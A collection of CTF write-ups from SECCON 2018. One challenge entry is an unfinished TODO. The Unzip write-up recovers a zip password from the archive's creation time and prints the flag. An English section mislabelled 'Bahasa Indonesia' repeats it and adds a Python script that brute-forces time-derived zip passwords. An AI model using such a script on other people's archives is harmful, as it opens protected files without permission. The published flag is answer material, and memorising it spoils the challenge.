---
**Points:** 419 | **Solves:** 16/653 | **Category:** Reversing

The tctkToy was a fragile Windows application toy. Reverse and repair it in order to work well. SUPPORT: Recommend using Windows10 machine to run successfully.

P.S. File changed to this (28th 09:52JST(28th 00:52UTC)) file.zip_5bd5bdb6eaf308b509af1c466b8a76578b75cdd9

Hint : you can write a tcl file with just only "button", "exec", "cd", "wm", "canvas", "image" and "pack" command.

[Download](file.zip_5bd5bdb6eaf308b509af1c466b8a76578b75cdd9)

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
TODO


## Bahasa Indonesia
TODO
--------------------------------------------------------------------------------
/seccon2018/tctktoy/file.zip_5bd5bdb6eaf308b509af1c466b8a76578b75cdd9:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/tctktoy/file.zip_5bd5bdb6eaf308b509af1c466b8a76578b75cdd9
--------------------------------------------------------------------------------
/seccon2018/unzip/README.md:
--------------------------------------------------------------------------------
# Unzip
---
**Points:** 101 | **Solves:** 597/653 | **Category:** Forensics

Unzip flag.zip.

[Download](unzip.zip_26c0cb5b40e9f78641ae44229cda45529418183f)

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
We got `flag.zip` and `makefile.sh`.

This is the content of `makefile.sh`.

```
echo 'SECCON{'`cat key`'}' > flag.txt
zip -e --password=`perl -e "print time()"` flag.zip flag.txt
```

We need to know the Unix time at which `flag.zip` was created.

Using `ls -l` we can see that the file timestamp is `Fri, Oct 26 2018 15:10:41 UTC`. We can convert the timestamp to Unix time and use it to open `flag.zip`.

```sh
$ php -a
Interactive shell

php > echo strtotime('Fri, Oct 26 2018 15:10:41');
1540566641

$ unzip flag.zip
Archive: flag.zip
[flag.zip] flag.txt password: 1540566641
inflating: flag.txt

$ cat flag.txt
SECCON{We1c0me_2_SECCONCTF2o18}
```

Flag: `SECCON{We1c0me_2_SECCONCTF2o18}`

## Bahasa Indonesia
We got `flag.zip` and `makefile.sh`.
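Because `time()` was the only secret, the password space is a handful of seconds around the archive's own timestamps. As an added example that is not part of the writeup, the following script automates the `ls -l` and `strtotime` step above for any archive built the same way, assuming (as in this challenge) that the zipping machine ran on UTC:

```python
"""Recover a zip password that was derived from time() at creation time.

Added example, not the writeup's own tooling. Candidates come from the zip
entry's DOS timestamp and the archive's filesystem mtime, each widened by a
few seconds, and are tried in turn.
"""
import calendar
import os
import zipfile
from datetime import datetime, timezone


def candidates_from_datetime(date_time, window=5):
    """Candidate time() values around a (year, month, day, h, m, s) UTC tuple.

    Zip entry timestamps have 2-second resolution, and the archive may be
    written a moment after time() was sampled, so neighbouring seconds are
    tried too, nearest first.
    """
    base = calendar.timegm(date_time)
    ordered = sorted(range(base - window, base + window + 1),
                     key=lambda t: (abs(t - base), t))
    return [str(t) for t in ordered]


def candidate_passwords(zip_path, window=5):
    """Every candidate derived from the timestamps the archive itself carries."""
    seeds = []
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            # Entry time is local time on the zipping machine; assumed UTC here,
            # matching the `ls -l` output shown in the writeup.
            seeds.append(info.date_time)
    # Filesystem mtime of the archive (preserved inside unzip.zip in the challenge).
    mtime = datetime.fromtimestamp(os.path.getmtime(zip_path), tz=timezone.utc)
    seeds.append(mtime.timetuple()[:6])
    seen, out = set(), []
    for seed in seeds:
        for pw in candidates_from_datetime(seed, window):
            if pw not in seen:
                seen.add(pw)
                out.append(pw)
    return out


def try_passwords(zip_path, passwords):
    """Return (password, plaintext) for the first password that decrypts."""
    with zipfile.ZipFile(zip_path) as zf:
        name = zf.namelist()[0]
        for pw in passwords:
            try:
                data = zf.read(name, pwd=pw.encode())
            except (RuntimeError, zipfile.BadZipFile):
                # RuntimeError: password check byte mismatch; BadZipFile: CRC mismatch
                continue
            return pw, data
    return None, None


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "flag.zip"
    print(try_passwords(path, candidate_passwords(path)))
```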

Here is the content of `makefile.sh`.

```
echo 'SECCON{'`cat key`'}' > flag.txt
zip -e --password=`perl -e "print time()"` flag.zip flag.txt
```

We need to know the Unix time at which `flag.zip` was created.

Using `ls -l` we can see that the file timestamp is `Fri, Oct 26 2018 15:10:41 UTC`. We can convert it to Unix time and use it to open `flag.zip`.

```sh
$ php -a
Interactive shell

php > echo strtotime('Fri, Oct 26 2018 15:10:41');
1540566641

$ unzip flag.zip
Archive: flag.zip
[flag.zip] flag.txt password: 1540566641
inflating: flag.txt

$ cat flag.txt
SECCON{We1c0me_2_SECCONCTF2o18}
```

Flag: `SECCON{We1c0me_2_SECCONCTF2o18}`
--------------------------------------------------------------------------------
/seccon2018/unzip/unzip.zip_26c0cb5b40e9f78641ae44229cda45529418183f:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/unzip/unzip.zip_26c0cb5b40e9f78641ae44229cda45529418183f
--------------------------------------------------------------------------------